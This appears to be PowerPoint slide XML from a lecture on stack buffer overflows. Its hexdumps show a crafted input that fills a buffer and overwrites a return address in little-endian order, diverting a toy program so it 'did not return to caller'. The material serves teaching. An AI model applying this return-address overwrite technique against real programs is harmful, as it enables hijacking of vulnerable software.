      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{878D469E-8372-2646-9B68-776A704DD202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="2961228"/>
            <a:ext cx="10782301" cy="389677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00000000  34 38 20 36 35 20 36 43  20 36 43 20 36 46 20 32  |48 65 6C 6C 6F 2|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  43 20 32 30 20 35 37 20  20 20 2f 2f 20 66 69 6c  |C 20 57   // fil|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000020  6c 20 74 68 65 20 62 75  66 66 65 72 0a 36 46 20  |l the buffer.6F |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  37 32 20 36 43 20 36 34  20 32 31 20 30 41 20 30  |72 6C 64 21 0A 0|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000040  30 20 30 30 20 20 20 2f  2f 20 66 69 6c 6c 20 74  |0 00   // fill t|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000050  68 65 20 73 70 61 63 65  20 62 65 74 77 65 65 6e  |he space between|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000060  20 62 75 66 66 65 72 20  61 6e 64 20 72 65 74 75  | buffer and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retu</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00000070  72 6e 20 61 64 64 72 65  73 73 0a 45 42 20 30 35  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>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address.EB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 05|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000080  20 34 30 20 20 20 20 20  20 20 20 20 20 20 20 20  | 40             |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000090  20 20 20 20 20 2f 2f 20  6e 65 77 20 72 65 74 75  |     // new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retu</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000000a0  72 6e 20 61 64 64 72 65  73 73 20 28 62 79 74 65  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> address (byte|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000b0  20 72 65 76 65 72 73 65  64 20 64 75 65 20 74 6f  | reversed due to|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000c0  20 6c 69 74 74 6c 65 2d  65 6e 64 69 61 6e 29 0a  | little-endian).|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000d0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DCEB10-247C-524F-8EBE-CCE41C3B5B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514081" y="1795605"/>
            <a:ext cx="648237" cy="5522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5A662A-91FB-B548-9656-077B4C629AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921448" y="3266308"/>
            <a:ext cx="919724" cy="3804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74CC1CD-048C-5247-B3D0-06F181921D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="5"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067386" y="2266956"/>
            <a:ext cx="988752" cy="1055061"/>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 name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB574FB0-8A0F-B94F-B667-A15C12A64D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3458542"/>
            <a:ext cx="10782301" cy="132556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  48 65 6c 6c 6f 2c 20 57  6f 72 6c 64 21 0a 00 00  |Hello, World!...|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  eb 05 40                                          |..@|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94370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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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xit" presetSubtype="5" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="exit" presetSubtype="5" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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par>
                                <p:cTn id="23" presetID="14" presetClass="exit" presetSubtype="5" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="exit" presetSubtype="5" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="entr" presetSubtype="5"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vertical)">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Attacking the Vulnerability</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78A56549-91BF-744B-BA00-265F05C5DE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="1350576"/>
            <a:ext cx="6493331"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a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, World!</a:t>
            </a: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3" name="Rounded Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EAF03B-0A4C-B74A-B41C-21635944C015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3118430"/>
            <a:ext cx="10782301" cy="132556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  48 65 6c 6c 6f 2c 20 57  6f 72 6c 64 21 0a 00 00  |Hello, World!...|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  eb 05 40                                          |..@|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BEEBBB-D660-244F-9612-E35503E4C0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610081" y="3505100"/>
            <a:ext cx="648237" cy="5522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69AD1AD-0821-E84E-8D08-56D71A85A8E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="4664534"/>
            <a:ext cx="9334502" cy="219346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vi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a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, World!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Did not return to caller! (insert maniacal laugh here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0B794DA-D8D5-3249-9F53-E8F80468C56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10373010" y="579133"/>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6" name="Rounded Rectangle 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B684FF7-2F5F-C64A-8D57-077EB56D17A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3116086"/>
            <a:ext cx="10782301" cy="132556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  48 65 6c 6c 6f 2c 20 57  6f 72 6c 64 21 00 00 00  |Hello, World!...|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  eb 05 40                                          |..@|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40A521C-65DE-E242-B2EA-5C8B60773F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7345825" y="1237664"/>
            <a:ext cx="4830980" cy="3182353"/>
            <a:chOff x="6512878" y="1197691"/>
            <a:chExt cx="4830980" cy="3182353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694E1031-4F96-BF40-8886-11B4C2AEB38D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="2787821"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB4BF9D-3DCD-B44F-BAED-898C1F3ADA0B}"/>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57</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'W'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="Rectangle 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D542CE1-7901-1C4A-A841-CEA75517FD38}"/>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20</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>' '</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Rectangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A2C2A6-3621-E341-8142-6CA21D970292}"/>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2C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>','</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA5D2E2-BF7A-A746-ADBA-D80FC969B43E}"/>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6F</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'o'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D0C945-EEEE-A842-A23B-612051A4C444}"/>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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B83394-4AB7-D74B-932F-AD6D407C5F01}"/>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6C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'l'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="Rectangle 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53918AA8-B2DA-2844-A360-A5D2BF157729}"/>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3" name="Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FF9F7F-559A-0949-A04D-B7531443572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48</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'H'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6A8A54-BA3E-954C-8685-6CC4C16BFC05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="3586038"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FE8C65-C0B6-574D-9974-E650CDFD2483}"/>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9" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36807E26-49F0-F84F-B66D-83AA2F327876}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5636A81-1E15-C94A-B7D1-A23AFDCA2139}"/>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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30BC046B-6107-6E4D-A8E8-EAE6A66EEA5D}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901D8A73-C97D-7840-B086-28798EB3CBEA}"/>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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B816009-6E15-B643-9B4C-A4329D677DA1}"/>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4" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BF925B-8B44-F140-A8FD-80DB6D9C1333}"/>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5" name="Rectangle 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB08D40E-A0E6-AA4C-8EBE-14BB49033220}"/>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20" name="Group 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FEF59CE-F5DC-9C45-8FDE-DF7712C7A5A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="1993802"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{651F2185-3DD5-AE45-B71D-CE0D390CCB33}"/>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1" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26B2AED7-1714-6748-8D01-56F42F516CBA}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A88FD18-FB81-D34A-8286-87B367492F6B}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C268F30-B5DF-C546-A75F-7431BC2CC0FF}"/>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4" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F34392E-3EC0-874B-A6B8-B5120E2A07BC}"/>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21</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'!'</a:t>
                </a:r>
